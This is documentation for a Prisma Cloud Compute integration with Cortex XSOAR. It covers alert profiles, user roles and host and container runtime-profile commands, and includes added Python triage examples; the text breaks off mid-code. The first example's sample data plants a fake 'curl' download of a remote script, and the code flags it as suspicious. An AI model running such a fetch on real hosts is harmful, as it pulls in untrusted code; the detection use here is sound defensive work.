
Palo Alto Networks - Prisma Cloud Compute

This Integration is part of the Prisma Cloud Compute by Palo Alto Networks Pack.#

Prisma™ Cloud Compute Edition delivers cloud workload protection (CWPP) for modern enterprises, providing holistic protection across hosts, containers, and serverless deployments in any cloud, throughout the application lifecycle. Prisma Cloud Compute Edition is cloud native and API-enabled, protecting all your workloads regardless of their underlying compute technology or the cloud in which they run.

This integration lets you import Palo Alto Networks - Prisma Cloud Compute alerts into Cortex XSOAR.

Configure Prisma Cloud Compute to Send Alerts to Cortex XSOAR#

To send alerts from Prisma Cloud Compute to Cortex XSOAR, you need to create an alert profile.

  1. Log in to your Prisma Cloud Compute console.
  2. Navigate to Manage > Alerts.
  3. Click Add Profile to create a new alert profile.
  4. On the left, select Demisto from the provider list.
  5. On the right, select the alert triggers. Alert triggers specify which alerts are sent to Cortex XSOAR.
  6. Click Save to save the alert profile.
  7. Make sure the user whose credentials the integration instance uses has at least the auditor role; otherwise the integration cannot fetch alerts.

Configure Prisma Cloud Compute on Cortex XSOAR#

  1. Navigate to Settings > Integrations > Servers & Services.
  2. Search for Prisma Cloud Compute.
  3. Click Add instance to create and configure a new integration.
    | Parameter | Description | Example |
    | --- | --- | --- |
    | Name | A meaningful name for the integration instance. | Prisma Cloud Compute_<alertProfileName> |
    | Fetches incidents | Configures this integration instance to fetch alerts from Prisma Cloud Compute. | N/A |
    | Prisma Cloud Compute Console URL | URL address and port of your Prisma Cloud Compute console. Copy the address from the alert profile created in Prisma Cloud Compute. | https://<console-address>:<port> |
    | Prisma Cloud Compute Project Name (if applicable) | Copy the project name from the alert profile created in Prisma Cloud Compute and paste it in this field. | N/A |
    | Trust any certificate (not secure) | Skips verification of the console's TLS certificate. Not recommended: anyone on the network path could then impersonate the console; supply the CA certificate below instead. | N/A |
    | Use system proxy settings | Runs the integration instance using the proxy server (HTTP or HTTPS) defined in the server configuration. | https://proxyserver.com |
    | Username | Prisma Cloud Compute login credentials. | N/A |
    | Prisma Cloud Compute CA Certificate | CA certificate used by Prisma Cloud Compute. Copy the certificate from the alert profile created in Prisma Cloud Compute. | N/A |
    | Source Reliability | Reliability of the source providing the intelligence data. | False |
  4. Click Test to validate the integration.
  5. Click Done to save the integration.

Configure Prisma Cloud Compute User Roles#

  • In order to access Prisma Cloud Compute resources, a user must be assigned with a role.
  • Without sufficient user roles, commands/fetching incidents might not work.
  • See below the user roles and their descriptions.
  • See 'Requires Role' section (each command requires a different type of role).

1) Go to Manage -> Authentication.

2) Select the user whose roles you want to edit, open Actions, and click ... (the more-options button).

3) Click Edit and choose a role in the Role section.

User Roles Configuration

Required User Roles#

To run every command in this integration, a user needs the permissions granted by the following user roles (each command's Requires Role section lists the one it needs):

  • devSecOps
  • ci
  • auditor
  • operator
  • devOps
  • vulnerabilityManager

A user with the administrator role can run every command in this integration.

See user roles descriptions in Prisma Cloud Compute: Available User Roles

Commands#

You can execute these commands from the Cortex XSOAR CLI, as part of an automation, or in a playbook. After you successfully execute a command, a DBot message appears in the War Room with the command details.

prisma-cloud-compute-profile-host-list#


Get information about hosts and their profile events. The hostname argument accepts asterisk wildcards, so you can match host profiles whose hostname contains a given substring (for example, hostname=*163*).

Base Command#

prisma-cloud-compute-profile-host-list

Requires Role#

devSecOps

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| hostname | A comma-separated list of profile (hostname) IDs. For example, !prisma-cloud-compute-profile-host-list hostname="149,257". | Optional |
| limit | The maximum number of hosts and their profile events to return. Must be between 1-50. Default is 15. | Optional |
| offset | The offset by which to begin listing hosts and their profile events. Default is 0. | Optional |

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.ProfileHost._id | String | The profile ID (hostname). |
| PrismaCloudCompute.ProfileHost.accountID | String | The cloud account ID associated with the profile. |
| PrismaCloudCompute.ProfileHost.apps.listeningPorts.command | String | The command that triggered the connection. |
| PrismaCloudCompute.ProfileHost.apps.listeningPorts.modified | Date | The timestamp of when the event occurred. |
| PrismaCloudCompute.ProfileHost.apps.listeningPorts.port | Number | The listening port number. |
| PrismaCloudCompute.ProfileHost.apps.listeningPorts.processPath | String | The path to the process that uses the port. |
| PrismaCloudCompute.ProfileHost.apps.name | String | The app name. |
| PrismaCloudCompute.ProfileHost.apps.outgoingPorts.command | String | The command that triggered the connection. |
| PrismaCloudCompute.ProfileHost.apps.outgoingPorts.country | String | The country ISO code for the given IP address. |
| PrismaCloudCompute.ProfileHost.apps.outgoingPorts.ip | String | The IP address captured over this port. |
| PrismaCloudCompute.ProfileHost.apps.outgoingPorts.modified | Date | The timestamp of when the event occurred. |
| PrismaCloudCompute.ProfileHost.apps.outgoingPorts.port | Number | The outgoing port number. |
| PrismaCloudCompute.ProfileHost.apps.outgoingPorts.processPath | String | The path to the process that uses the port. |
| PrismaCloudCompute.ProfileHost.apps.processes.command | String | The executed command. |
| PrismaCloudCompute.ProfileHost.apps.processes.md5 | String | The process binary MD5 sum. |
| PrismaCloudCompute.ProfileHost.apps.processes.modified | Boolean | Whether the process binary was modified after the container started. |
| PrismaCloudCompute.ProfileHost.apps.processes.path | String | The process binary path. |
| PrismaCloudCompute.ProfileHost.apps.processes.ppath | String | The parent process path. |
| PrismaCloudCompute.ProfileHost.apps.processes.time | Date | The time in which the process was added. If the process was modified, time is the modification time. |
| PrismaCloudCompute.ProfileHost.apps.processes.user | String | The username of the user who started the process. |
| PrismaCloudCompute.ProfileHost.apps.startupProcess.command | String | The executed command. |
| PrismaCloudCompute.ProfileHost.apps.startupProcess.md5 | String | The process binary MD5 sum. |
| PrismaCloudCompute.ProfileHost.apps.startupProcess.modified | Boolean | Whether the process binary was modified after the container started. |
| PrismaCloudCompute.ProfileHost.apps.startupProcess.path | String | The process binary path. |
| PrismaCloudCompute.ProfileHost.apps.startupProcess.ppath | String | The parent process path. |
| PrismaCloudCompute.ProfileHost.apps.startupProcess.time | Date | The time in which the process was added. If the process was modified, time is the modification time. |
| PrismaCloudCompute.ProfileHost.apps.startupProcess.user | String | The username of the user who started the process. |
| PrismaCloudCompute.ProfileHost.collections | String | A list of collections to which this profile applies. |
| PrismaCloudCompute.ProfileHost.created | Date | The profile creation time. |
| PrismaCloudCompute.ProfileHost.hash | Number | The uint32 hash associated with the profile. |
| PrismaCloudCompute.ProfileHost.labels | String | The labels associated with the profile. |
| PrismaCloudCompute.ProfileHost.sshEvents.command | String | The executed command. |
| PrismaCloudCompute.ProfileHost.sshEvents.country | String | The SSH client's country of origin. |
| PrismaCloudCompute.ProfileHost.sshEvents.ip | String | The connection client IP address. |
| PrismaCloudCompute.ProfileHost.sshEvents.loginTime | Date | The SSH login time. |
| PrismaCloudCompute.ProfileHost.sshEvents.md5 | String | The process binary MD5 sum. |
| PrismaCloudCompute.ProfileHost.sshEvents.modified | Boolean | Whether the process binary was modified after the container started. |
| PrismaCloudCompute.ProfileHost.sshEvents.path | String | The process binary path. |
| PrismaCloudCompute.ProfileHost.sshEvents.ppath | String | The parent process path. |
| PrismaCloudCompute.ProfileHost.sshEvents.time | Date | The time in which the process was added. If the process was modified, time is the modification time. |
| PrismaCloudCompute.ProfileHost.sshEvents.user | String | The username of the user who started the process. |
| PrismaCloudCompute.ProfileHost.time | Date | The last time this profile was modified. |
| PrismaCloudCompute.ProfileHost.geoip.countries.code | String | The country code of the computer that accessed the host. |
| PrismaCloudCompute.ProfileHost.geoip.countries.ip | String | The IP address of the computer that accessed the host. |
| PrismaCloudCompute.ProfileHost.geoip.countries.modified | Date | The last time the IP address associated with this country accessed the host console. |
| PrismaCloudCompute.ProfileHost.geoip.modified | Date | The last time any of the country IP addresses accessed the host console. |

Command Example#

!prisma-cloud-compute-profile-host-list hostname=*163*

Context Example#

```json
{
  "PrismaCloudCompute": {
    "ProfileHost": {
      "hash": 1,
      "created": "2020-11-10T09:37:30.314Z",
      "geoip": {
        "modified": "2021-12-10T11:06:03.206Z",
        "countries": [
          {
            "ip": "1.1.1.1",
            "code": "US",
            "modified": "2021-12-10T11:06:03.206Z"
          },
          {
            "ip": "2.2.2.2",
            "code": "IE",
            "modified": "2021-12-10T05:22:01.858Z"
          }
        ]
      },
      "labels": [
        "osDistro:amzn",
        "osVersion:2"
      ],
      "apps": [
        {
          "processes": [
            {
              "ppath": "/usr/lib/systemd/systemd",
              "command": "/usr/sbin/auditd",
              "user": "root",
              "time": "2020-11-10T09:37:30.415Z",
              "path": "/usr/sbin/auditd",
              "md5": ""
            }
          ],
          "startupProcess": {
            "ppath": "/usr/lib/systemd/systemd",
            "command": "/usr/sbin/auditd",
            "user": "root",
            "time": "2020-11-10T09:37:30.415Z",
            "path": "/usr/sbin/auditd",
            "md5": ""
          },
          "name": "auditd"
        },
        {
          "processes": [
            {
              "ppath": "/usr/lib/systemd/systemd",
              "command": "/usr/sbin/atd -f",
              "user": "root",
              "time": "2020-11-10T09:37:30.415Z",
              "path": "/usr/sbin/atd",
              "md5": ""
            }
          ],
          "startupProcess": {
            "ppath": "/usr/lib/systemd/systemd",
            "command": "/usr/sbin/atd -f",
            "user": "root",
            "time": "2020-11-10T09:37:30.415Z",
            "path": "/usr/sbin/atd",
            "md5": ""
          },
          "name": "atd"
        }
      ],
      "collections": [
        "All",
        "123"
      ],
      "time": "2021-12-10T11:06:03.206Z",
      "sshEvents": [
        {
          "ppath": "/usr/bin/bash",
          "country": "IL",
          "time": "December 10, 2021 11:06:03 AM",
          "command": "grep twistlock_data - High rate of events, throttling started",
          "user": "user123",
          "ip": "1.2.3.4",
          "path": "/usr/bin/grep",
          "loginTime": "September 02, 2021 09:27:41 AM",
          "md5": ""
        },
        {
          "ppath": "/usr/bin/bash",
          "country": "IL",
          "time": "December 10, 2021 11:06:03 AM",
          "command": "docker -H unix:///var/run/docker.sock ps -a --format {{ .Names }}",
          "user": "user123",
          "ip": "1.1.1.1",
          "path": "/usr/bin/docker",
          "loginTime": "September 02, 2021 09:27:41 AM",
          "md5": ""
        }
      ],
      "_id": "host163",
      "accountID": "1234"
    }
  }
}
```

Human Readable Output - One Host#

Host Description#

| Hostname | Distribution | Collections |
| --- | --- | --- |
| host163 | amzn 2 | All, 123 |

Apps#

| AppName | StartupProcess | User | LaunchTime |
| --- | --- | --- | --- |
| auditd | /usr/sbin/auditd | root | November 10, 2020 09:37:30 AM |
| atd | /usr/sbin/atd | root | November 10, 2020 09:37:30 AM |

SSH Events#

| User | Ip | ProcessPath | Command | Time |
| --- | --- | --- | --- | --- |
| user123 | 1.2.3.4 | /usr/bin/grep | grep twistlock_data - High rate of events, throttling started | December 10, 2021 11:06:03 AM |
| user123 | 1.1.1.1 | /usr/bin/docker | docker -H unix:///var/run/docker.sock ps -a --format {{ .Names }} | December 10, 2021 11:06:03 AM |

Human Readable Output - Multiple Hosts#

Host Description#

| Hostname | Distribution | Collections |
| --- | --- | --- |
| host163 | amzn 2 | All, 123 |
| host249 | Ubuntu 16.04 | All, 123 |
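The context above is what an analyst usually reads by hand. The following is an added example, not code from the Prisma Cloud Compute integration or its pack: a triage function over a PrismaCloudCompute.ProfileHost entry that surfaces SSH logins from outside a country allow-list, processes whose binary changed after startup (the `modified` flag in the table), and any command that reaches the Docker socket, which is root-equivalent on the host. The allow-list, the severity ranking and the sample data are assumptions made for this example; the sample is a trimmed copy of the context example above plus one constructed "cron" app that exercises the modified-binary path.

```python
"""Triage of a PrismaCloudCompute.ProfileHost context entry (added example)."""
from __future__ import annotations

from typing import Any

DOCKER_SOCKET = "/var/run/docker.sock"

# Constructed sample: a subset of the page's context example, plus a fake curl
# process under a "cron" app with modified=True (that app is not in the original data).
SAMPLE_PROFILE_HOST: dict[str, Any] = {
    "_id": "host163",
    "accountID": "1234",
    "labels": ["osDistro:amzn", "osVersion:2"],
    "apps": [
        {
            "name": "auditd",
            "startupProcess": {"path": "/usr/sbin/auditd", "command": "/usr/sbin/auditd",
                               "user": "root", "modified": False},
            "processes": [{"path": "/usr/sbin/auditd", "command": "/usr/sbin/auditd",
                           "user": "root", "modified": False}],
        },
        {
            "name": "cron",
            "startupProcess": {"path": "/usr/sbin/crond", "command": "/usr/sbin/crond -n",
                               "user": "root", "modified": False},
            "processes": [{"path": "/usr/bin/curl", "command": "curl http://203.0.113.5/x.sh",
                           "user": "root", "modified": True}],
        },
    ],
    "sshEvents": [
        {"user": "user123", "ip": "1.2.3.4", "country": "IL", "path": "/usr/bin/grep",
         "command": "grep twistlock_data - High rate of events, throttling started"},
        {"user": "user123", "ip": "1.1.1.1", "country": "IL", "path": "/usr/bin/docker",
         "command": "docker -H unix:///var/run/docker.sock ps -a --format {{ .Names }}"},
        {"user": "deploy", "ip": "198.51.100.7", "country": "US", "path": "/usr/bin/bash",
         "command": "bash"},
    ],
}


def ssh_from_unexpected_country(profile: dict[str, Any], allowed: set[str]) -> list[dict[str, Any]]:
    """SSH events whose client country is not in the allow-list."""
    return [e for e in profile.get("sshEvents", []) if e.get("country") not in allowed]


def modified_binaries(profile: dict[str, Any]) -> list[tuple[str, str]]:
    """(app name, binary path) for every process whose binary changed after start."""
    found: list[tuple[str, str]] = []
    for app in profile.get("apps", []):
        candidates = [app.get("startupProcess", {})] + list(app.get("processes", []))
        for proc in candidates:
            if proc.get("modified"):
                found.append((app.get("name", "?"), proc.get("path", "?")))
    return found


def docker_socket_commands(profile: dict[str, Any]) -> list[str]:
    """Any SSH-session or app command that references the Docker socket."""
    commands = [e.get("command", "") for e in profile.get("sshEvents", [])]
    for app in profile.get("apps", []):
        commands += [p.get("command", "") for p in app.get("processes", [])]
    return [c for c in commands if DOCKER_SOCKET in c]


def triage(profile: dict[str, Any], allowed_countries: set[str]) -> dict[str, Any]:
    """Summarise one host profile. The severity ranking is an assumption for this example."""
    foreign = ssh_from_unexpected_country(profile, allowed_countries)
    modified = modified_binaries(profile)
    docker = docker_socket_commands(profile)
    if modified or docker:
        severity = "high"      # tampered binary or host-level control via the Docker API
    elif foreign:
        severity = "medium"    # login from an unexpected country only
    else:
        severity = "low"
    return {
        "host": profile.get("_id"),
        "account": profile.get("accountID"),
        "ssh_unexpected_country": foreign,
        "modified_binaries": modified,
        "docker_socket_commands": docker,
        "severity": severity,
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_PROFILE_HOST, {"IL"}), indent=2))
```

In an XSOAR automation the profile would come from the PrismaCloudCompute.ProfileHost context key rather than the embedded sample; the functions only depend on the field names listed in the table above.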

prisma-cloud-compute-profile-container-list#


Get information about containers and their profile events. The filter arguments accept asterisk wildcards, so you can match container profiles whose fields contain a given substring (for example, image=*defender*).

Base Command#

prisma-cloud-compute-profile-container-list

Requires Role#

devSecOps

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| cluster | A comma-separated list of runtime profile Kubernetes clusters. | Optional |
| id | A comma-separated list of runtime profile IDs. For example, !prisma-cloud-compute-profile-container-list id="256,148". | Optional |
| image | A comma-separated list of runtime profile images. For example, !prisma-cloud-compute-profile-container-list image="console,defender". | Optional |
| image_id | A comma-separated list of runtime profile image IDs. For example, !prisma-cloud-compute-profile-container-list image_id="123,456". | Optional |
| namespace | A comma-separated list of runtime profile Kubernetes namespaces. For example, !prisma-cloud-compute-profile-container-list namespace="namespace1,namespace2". | Optional |
| os | A comma-separated list of service runtime profile operating systems. For example, !prisma-cloud-compute-profile-container-list os="Red Hat,Windows". | Optional |
| state | A comma-separated list of runtime profile states. For example, !prisma-cloud-compute-profile-container-list state=active. | Optional |
| limit | The maximum number of containers and their profile events to return. Must be between 1-50. Default is 15. | Optional |
| offset | The offset by which to begin listing containers and their profile events. Default is 0. | Optional |

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.ProfileContainer._id | String | The profile ID. |
| PrismaCloudCompute.ProfileContainer.accountIDs | String | The cloud account IDs associated with the container runtime profile. |
| PrismaCloudCompute.ProfileContainer.archived | Boolean | Whether this profile is archived. |
| PrismaCloudCompute.ProfileContainer.capabilities.ci | Boolean | Whether the container is allowed to write binaries to disk and run them based on static analysis. |
| PrismaCloudCompute.ProfileContainer.capabilities.cloudMetadata | Boolean | Whether the given container can query the cloud metadata API based on static analysis. |
| PrismaCloudCompute.ProfileContainer.capabilities.dnsCache | Boolean | Whether the DNS services used by all the pods in the cluster were added to the profile based on static analysis. |
| PrismaCloudCompute.ProfileContainer.capabilities.dynamicDNSQuery | Boolean | Whether capped behavioral DNS queries were added to the profile based on static analysis. |
| PrismaCloudCompute.ProfileContainer.capabilities.dynamicFileCreation | Boolean | Whether capped behavioral file system paths were added to the profile based on static analysis. |
| PrismaCloudCompute.ProfileContainer.capabilities.dynamicProcessCreation | Boolean | Whether capped behavioral processes were added to the profile based on static analysis. |
| PrismaCloudCompute.ProfileContainer.capabilities.k8s | Boolean | Whether the given container can perform Kubernetes networking tasks (e.g., contact the API server). |
| PrismaCloudCompute.ProfileContainer.capabilities.proxy | Boolean | Whether the container can listen on any port and perform multiple outbound connections. |
| PrismaCloudCompute.ProfileContainer.capabilities.sshd | Boolean | Whether the container can run sshd processes. |
| PrismaCloudCompute.ProfileContainer.capabilities.unpacker | Boolean | Whether the container is allowed to write shared libraries to disk. |
| PrismaCloudCompute.ProfileContainer.cluster | String | The provided cluster name. |
| PrismaCloudCompute.ProfileContainer.collections | String | Collections to which this profile applies. |
| PrismaCloudCompute.ProfileContainer.created | Date | The profile creation time. |
| PrismaCloudCompute.ProfileContainer.entrypoint | String | The image entrypoint. |
| PrismaCloudCompute.ProfileContainer.events._id | String | The history event entity. |
| PrismaCloudCompute.ProfileContainer.events.command | String | The process that was executed. |
| PrismaCloudCompute.ProfileContainer.events.hostname | String | The hostname on which the command was invoked. |
| PrismaCloudCompute.ProfileContainer.events.time | Date | The time of the event. |
| PrismaCloudCompute.ProfileContainer.filesystem.behavioral.mount | Boolean | Whether the given folder is mounted. |
| PrismaCloudCompute.ProfileContainer.filesystem.behavioral.path | String | The file path. |
| PrismaCloudCompute.ProfileContainer.filesystem.behavioral.process | String | The process that accessed the file. |
| PrismaCloudCompute.ProfileContainer.filesystem.behavioral.time | Date | The time in which the file was added. |
| PrismaCloudCompute.ProfileContainer.filesystem.static.mount | Boolean | Whether the given folder is mounted. |
| PrismaCloudCompute.ProfileContainer.filesystem.static.path | String | The file path. |
| PrismaCloudCompute.ProfileContainer.filesystem.static.process | String | The process that accessed the file. |
| PrismaCloudCompute.ProfileContainer.filesystem.static.time | Date | The time in which the file was added. |
| PrismaCloudCompute.ProfileContainer.hash | Number | The uint32 hash associated with the profile. |
| PrismaCloudCompute.ProfileContainer.hostNetwork | Boolean | Whether the instance shares the network namespace with the host. |
| PrismaCloudCompute.ProfileContainer.hostPid | Boolean | Whether the instance shares the PID namespace with the host. |
| PrismaCloudCompute.ProfileContainer.image | String | The image the container runs with. |
| PrismaCloudCompute.ProfileContainer.imageID | String | The profile's image ID. |
| PrismaCloudCompute.ProfileContainer.infra | Boolean | Whether this is an infrastructure container. |
| PrismaCloudCompute.ProfileContainer.istio | Boolean | Whether it is an Istio-monitored profile. |
| PrismaCloudCompute.ProfileContainer.k8s.clusterRoles.labels.key | String | The key of the label. |
| PrismaCloudCompute.ProfileContainer.k8s.clusterRoles.labels.value | String | The value of the label. |
| PrismaCloudCompute.ProfileContainer.k8s.clusterRoles.name | String | The role name. |
| PrismaCloudCompute.ProfileContainer.k8s.clusterRoles.roleBinding | String | The name of the role binding used for display. |
| PrismaCloudCompute.ProfileContainer.k8s.clusterRoles.rules | String | The list of rules associated with the cluster role. |
| PrismaCloudCompute.ProfileContainer.k8s.roles.labels.key | String | The key of the label. |
| PrismaCloudCompute.ProfileContainer.k8s.roles.labels.value | String | The value of the label. |
| PrismaCloudCompute.ProfileContainer.k8s.roles.name | String | The Kubernetes role name. |
| PrismaCloudCompute.ProfileContainer.k8s.roles.namespace | String | The namespace associated with the role. |
| PrismaCloudCompute.ProfileContainer.k8s.roles.roleBinding | String | The name of the role binding used for display. |
| PrismaCloudCompute.ProfileContainer.k8s.roles.rules | String | The policy rules associated with the role. |
| PrismaCloudCompute.ProfileContainer.k8s.serviceAccount | String | The service account used to access the Kubernetes API server. This field is empty if the container is not running inside a pod. |
| PrismaCloudCompute.ProfileContainer.label | String | The profile's label. |
| PrismaCloudCompute.ProfileContainer.lastUpdate | Date | The last time this profile was modified. |
| PrismaCloudCompute.ProfileContainer.learnedStartup | Boolean | Whether the startup events were learned. |
| PrismaCloudCompute.ProfileContainer.namespace | String | The Kubernetes deployment namespace. |
| PrismaCloudCompute.ProfileContainer.network.behavioral.dnsQueries.domainName | String | The queried domain name. |
| PrismaCloudCompute.ProfileContainer.network.behavioral.dnsQueries.domainType | String | The queried domain type. |
| PrismaCloudCompute.ProfileContainer.network.listeningPorts.app | String | The name of the app. |
| PrismaCloudCompute.ProfileContainer.network.listeningPorts.portsData.all | Boolean | Whether this port data represents any arbitrary ports. |
| PrismaCloudCompute.ProfileContainer.network.listeningPorts.portsData.ports.port | Number | The port number. |
| PrismaCloudCompute.ProfileContainer.network.listeningPorts.portsData.ports.time | Date | The learning timestamp of this port. |
| PrismaCloudCompute.ProfileContainer.network.outboundPorts.portsData.all | Boolean | Whether this port data represents any arbitrary ports. |
| PrismaCloudCompute.ProfileContainer.network.outboundPorts.portsData.ports.port | Number | The port number. |
| PrismaCloudCompute.ProfileContainer.network.static.listeningPorts.ports.time | Date | The learning timestamp of this port. |
| PrismaCloudCompute.ProfileContainer.network.static.listeningPorts.app | String | The name of the app. |
| PrismaCloudCompute.ProfileContainer.network.static.listeningPorts.portsData.all | Boolean | Whether this port data represents any arbitrary ports. |
| PrismaCloudCompute.ProfileContainer.network.static.listeningPorts.portsData.ports.port | Number | The port number. |
| PrismaCloudCompute.ProfileContainer.network.static.listeningPorts.portsData.ports.time | Date | The learning timestamp of this port. |
| PrismaCloudCompute.ProfileContainer.os | String | The profile image operating system. |
| PrismaCloudCompute.ProfileContainer.processes.behavioral.command | String | The executed command. |
| PrismaCloudCompute.ProfileContainer.processes.behavioral.md5 | String | The process binary MD5 sum. |
| PrismaCloudCompute.ProfileContainer.processes.behavioral.modified | Boolean | Whether the process binary was modified after the container started. |
| PrismaCloudCompute.ProfileContainer.processes.behavioral.path | String | The process binary path. |
| PrismaCloudCompute.ProfileContainer.processes.behavioral.ppath | String | The parent process path. |
| PrismaCloudCompute.ProfileContainer.processes.behavioral.time | Date | The time in which the process was added. If the process was modified, time is the modification time. |
| PrismaCloudCompute.ProfileContainer.processes.behavioral.user | String | The username of the user who started the process. |
| PrismaCloudCompute.ProfileContainer.processes.static.command | String | The executed command. |
| PrismaCloudCompute.ProfileContainer.processes.static.md5 | String | The process binary MD5 sum. |
| PrismaCloudCompute.ProfileContainer.processes.static.modified | Boolean | Whether the process binary was modified after the container started. |
| PrismaCloudCompute.ProfileContainer.processes.static.path | String | The process binary path. |
| PrismaCloudCompute.ProfileContainer.processes.static.ppath | String | The parent process path. |
| PrismaCloudCompute.ProfileContainer.processes.static.time | Date | The time in which the process was added. If the process was modified, time is the modification time. |
| PrismaCloudCompute.ProfileContainer.processes.static.user | String | The username of the user who started the process. |
| PrismaCloudCompute.ProfileContainer.relearningCause | String | The reason a profile entered learning mode after being activated. |
| PrismaCloudCompute.ProfileContainer.remainingLearningDurationSec | Number | The total time left that the system needs to finish learning this image. |
| PrismaCloudCompute.ProfileContainer.state | String | The current state of the profile. |

Command Example#

!prisma-cloud-compute-profile-container-list image=*defender* limit=1

Context Example#

```json
{
  "PrismaCloudCompute": {
    "ProfileContainer": {
      "image": "twistlock/private:defender_21_04_439",
      "hostNetwork": true,
      "learnedStartup": true,
      "k8s": {},
      "archived": false,
      "network": {
        "geoip": {
          "modified": "2021-12-10T13:31:42.924Z",
          "countries": [
            {
              "ip": "1.1.1.1",
              "code": "IE",
              "modified": "2021-12-10T13:31:42.922Z"
            },
            {
              "ip": "2.2.2.2",
              "code": "US",
              "modified": "2021-12-09T13:30:42.148Z"
            }
          ]
        },
        "static": {
          "listeningPorts": []
        },
        "behavioral": {
          "outboundPorts": {
            "ports": [
              {
                "port": 80,
                "time": "2021-09-02T11:05:16.836Z"
              }
            ]
          }
        }
      },
      "capabilities": {
        "ci": true
      },
      "label": "twistlock",
      "state": "active",
      "collections": [
        "All",
        "123",
        "Prisma Cloud resources"
      ],
      "entrypoint": "/usr/local/bin/defender",
      "events": null,
      "lastUpdate": "2021-09-02T11:05:10.935Z",
      "hash": 3,
      "infra": false,
      "accountIDs": [
        "123"
      ],
      "processes": {
        "static": [
          {
            "ppath": "",
            "path": "/usr/bin/mongodump",
            "time": "0001-01-01T00:00:00Z",
            "md5": ""
          },
          {
            "ppath": "",
            "path": "/usr/bin/mongorestore",
            "time": "0001-01-01T00:00:00Z",
            "md5": ""
          }
        ],
        "behavioral": [
          {
            "ppath": "/usr/local/bin/defender",
            "path": "/usr/local/bin/fsmon",
            "time": "2021-09-02T11:05:08.931Z",
            "md5": ""
          },
          {
            "ppath": "/usr/bin/apt-get",
            "path": "/usr/lib/apt/methods/gpgv",
            "time": "2021-11-24T15:12:28.502Z",
            "command": "gpgv",
            "md5": ""
          }
        ]
      },
      "created": "2020-09-02T11:05:08.931Z",
      "imageID": "sha256:8d82e2c21c33e1ffb37ea901d18df15c08123258609e6d7c4aecc7fb4a5a8738",
      "filesystem": {
        "static": [
          {
            "process": "*",
            "path": "/var/log/audit",
            "mount": true,
            "time": "2021-09-02T11:05:08.931Z"
          },
          {
            "process": "*",
            "path": "/var/lib/twistlock",
            "mount": true,
            "time": "2021-09-02T11:05:08.931Z"
          }
        ],
        "behavioral": [
          {
            "process": "/usr/local/bin/defender",
            "path": "/prisma-static-data",
            "mount": true,
            "time": "2021-09-02T11:05:10.935Z"
          },
          {
            "process": "/usr/local/bin/defender",
            "path": "/tmp",
            "mount": false,
            "time": "2021-09-02T11:05:16.784Z"
          }
        ]
      },
      "_id": "container123",
      "os": "Red Hat Enterprise Linux 8.4 (Ootpa)",
      "remainingLearningDurationSec": -1,
      "hostPid": true
    }
  }
}
```

Human Readable Output - One Container#

Container Description#

| ContainerID | Image | Os | State | Created | EntryPoint |
| --- | --- | --- | --- | --- | --- |
| container123 | twistlock/private:defender_21_04_439 | Red Hat Enterprise Linux 8.4 (Ootpa) | active | September 02, 2020 11:05:08 AM | /usr/local/bin/defender |

Processes#

| Type | Path | DetectionTime |
| --- | --- | --- |
| static | /usr/bin/mongodump | January 01, 2021 00:00:00 AM |
| static | /usr/bin/mongorestore | January 01, 2021 00:00:00 AM |
| behavioral | /usr/local/bin/fsmon | September 02, 2021 11:05:08 AM |
| behavioral | /usr/lib/apt/methods/gpgv | November 24, 2021 15:12:28 PM |

Human Readable Output - Multiple Containers#

Container Description#

| ContainerID | Image | Os | State | Created | EntryPoint |
| --- | --- | --- | --- | --- | --- |
| container123 | twistlock/private:defender_21_04_439 | Red Hat Enterprise Linux 8.4 (Ootpa) | active | September 02, 2021 11:05:08 AM | /usr/local/bin/defender |
| container1234 | twistlock/private:console_21_04_439 | Red Hat Enterprise Linux 8.4 (Ootpa) | active | September 02, 2021 11:05:08 AM | /app/server |
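Two things the command description leaves to the reader: `limit` is capped at 50, so an automation that wants every profile must advance `offset` itself and stop on the first short page, and the profile fields worth reading first are the host namespace flags, the capabilities block, the learning state and any package-manager activity in the behavioral process list (the gpgv-under-apt-get entry in the context example above is the kind of thing to ask about). The following is an added example, not code from the integration: `run_command` stands in for XSOAR's demisto.executeCommand (an assumption) and is backed here by a fake built from constructed profiles so the example runs offline. The first constructed profile mirrors the context example above; the rest are benign filler.

```python
"""Paging through container runtime profiles and reviewing each one (added example)."""
from __future__ import annotations

from typing import Any, Callable, Iterator

PAGE_MAX = 50  # the command rejects limit values outside 1..50
RISKY_CAPABILITIES = {"ci", "sshd", "proxy", "cloudMetadata", "k8s"}
PACKAGE_MANAGERS = ("/usr/bin/apt", "/usr/bin/dpkg", "/usr/bin/yum", "/usr/bin/dnf", "/usr/bin/pip")

# Signature assumed for the XSOAR command runner: (command name, args) -> list of context entries.
RunCommand = Callable[[str, dict[str, Any]], list[dict[str, Any]]]


def iter_container_profiles(run_command: RunCommand, filters: dict[str, Any] | None = None,
                            page_size: int = PAGE_MAX) -> Iterator[dict[str, Any]]:
    """Yield every profile matching `filters`, fetching `page_size` at a time."""
    offset = 0
    while True:
        args = dict(filters or {}, limit=page_size, offset=offset)
        page = run_command("prisma-cloud-compute-profile-container-list", args)
        yield from page
        if len(page) < page_size:  # short page: nothing left on the server
            return
        offset += page_size


def review_profile(profile: dict[str, Any]) -> list[str]:
    """Human-readable findings for one profile; an empty list means nothing notable."""
    findings: list[str] = []
    if profile.get("hostPid"):
        findings.append("shares host PID namespace")
    if profile.get("hostNetwork"):
        findings.append("shares host network namespace")
    enabled = {cap for cap, on in profile.get("capabilities", {}).items() if on}
    findings += [f"capability:{cap}" for cap in sorted(enabled & RISKY_CAPABILITIES)]
    if profile.get("state") != "active":
        findings.append(f"state:{profile.get('state')}")
    if profile.get("remainingLearningDurationSec", -1) > 0:
        findings.append("profile still learning; runtime policy not yet enforced")
    for proc in profile.get("processes", {}).get("behavioral", []):
        if proc.get("ppath", "").startswith(PACKAGE_MANAGERS) or proc.get("path", "").startswith(PACKAGE_MANAGERS):
            findings.append(f"package manager ran at runtime: {proc.get('path')}")
    return findings


def flagged_profiles(run_command: RunCommand, filters: dict[str, Any] | None = None) -> dict[str, list[str]]:
    """Map profile _id -> findings for every profile that has at least one finding."""
    result: dict[str, list[str]] = {}
    for profile in iter_container_profiles(run_command, filters):
        findings = review_profile(profile)
        if findings:
            result[profile["_id"]] = findings
    return result


# --- constructed data and a fake backend so the example runs offline ---------
DEFENDER_PROFILE: dict[str, Any] = {  # mirrors the page's context example
    "_id": "container123",
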